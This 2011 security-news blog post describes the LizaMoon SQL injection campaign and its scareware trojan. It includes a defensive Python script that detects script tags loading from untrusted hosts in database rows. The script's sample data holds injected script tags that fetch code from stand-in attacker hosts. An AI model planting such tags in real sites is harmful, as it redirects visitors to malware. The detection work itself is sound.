Thursday, April 7, 2011

Liza Moon Virus and MySQL Injection Attack - Security News


A SQL injection attack named "Liza Moon", after the first known web site to be compromised, has been spreading since December 2010, but it appears to be accelerating and has to date affected millions of users.

There are two parts to this virus. First, the injection attack targets web sites running unpatched MySQL server instances; once a site is compromised, it redirects visitors to another web site that announces that the user's PC is infected and offers a download of "Windows Stability Center" to address this. That file actually contains a trojan and is the second phase of the attack. The Windows Stability Center interface is very professional, and the way it presents threats makes it easy to understand how people are being duped into entering their information.
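The redirect described above lives in the site's own database as an injected script tag, so the cheapest place to look for it is a dump of the text columns. As an added example (not from the original post or from WebSense), the following Python script flags every stored value whose script tags load from a host outside a trusted list; the trusted-host set, the row format and the sample rows are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption for this example: hosts the site legitimately loads scripts from.
TRUSTED_SCRIPT_HOSTS = {"www.example.com", "cdn.example.com"}


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <SCRIPT SRC=...> is caught too.
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def external_script_hosts(fragment, trusted=TRUSTED_SCRIPT_HOSTS):
    """Return the set of script-source hosts in `fragment` that are not trusted."""
    parser = _ScriptSrcCollector()
    parser.feed(fragment)
    parser.close()
    hosts = set()
    for src in parser.srcs:
        # Default scheme lets scheme-relative "//host/path" sources resolve to a host.
        host = urlparse(src, scheme="http").hostname
        if host and host.lower() not in trusted:
            hosts.add(host.lower())
    return hosts


def find_injected_rows(rows, trusted=TRUSTED_SCRIPT_HOSTS):
    """rows: iterable of (row_id, column_name, text). Returns (row_id, column_name, hosts) hits."""
    hits = []
    for row_id, column, text in rows:
        if "<script" not in text.lower():
            continue  # cheap pre-filter; most rows never reach the parser
        hosts = external_script_hosts(text, trusted)
        if hosts:
            hits.append((row_id, column, sorted(hosts)))
    return hits


# Constructed sample rows standing in for a dump of a CMS's text columns.
SAMPLE_ROWS = [
    (1, "body", "<p>Spring sale starts Monday.</p>"),
    (2, "body", '<p>Our partners</p><script src="https://cdn.example.com/app.js"></script>'),
    (3, "title", 'Welcome</title><script src="http://attacker.invalid/ur.php"></script>'),
    (4, "body", "<p>Contact us</p><SCRIPT SRC='//evil-redirect.invalid/ur.php'></SCRIPT>"),
]
INJECTED = find_injected_rows(SAMPLE_ROWS)  # rows 3 and 4 are reported
```

Point the row iterator at the real table (or a dump of it) and treat every hit as an indicator that the application's SQL inputs need to be parameterized, not just the row cleaned.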

If the user allows the download to be installed, it includes a set of "scareware" applications that conduct a bogus scan of the PC, report non-existent threats, and prompt the user for a credit card to "upgrade to the full version" to remove the threats.

As of today, over 4 million web sites have been affected, broadcasting this threat to visitors; at one point, even Apple's iTunes was infected. Properly updated anti-virus on the client end, and following the Internet hygiene rule of not downloading anything unless you are sure of the provider, can prevent infection, but from a social engineering perspective the messaging on this one is pretty convincing. Hopefully security researchers will be able to "follow the money" and ferret out the perpetrator of this attack. It is interesting for its complexity: it uses a MySQL vulnerability to create a distribution network for itself, and its payload seems to be a highly convincing trojan.

WebSense offered this video to explain how the injection attack works:
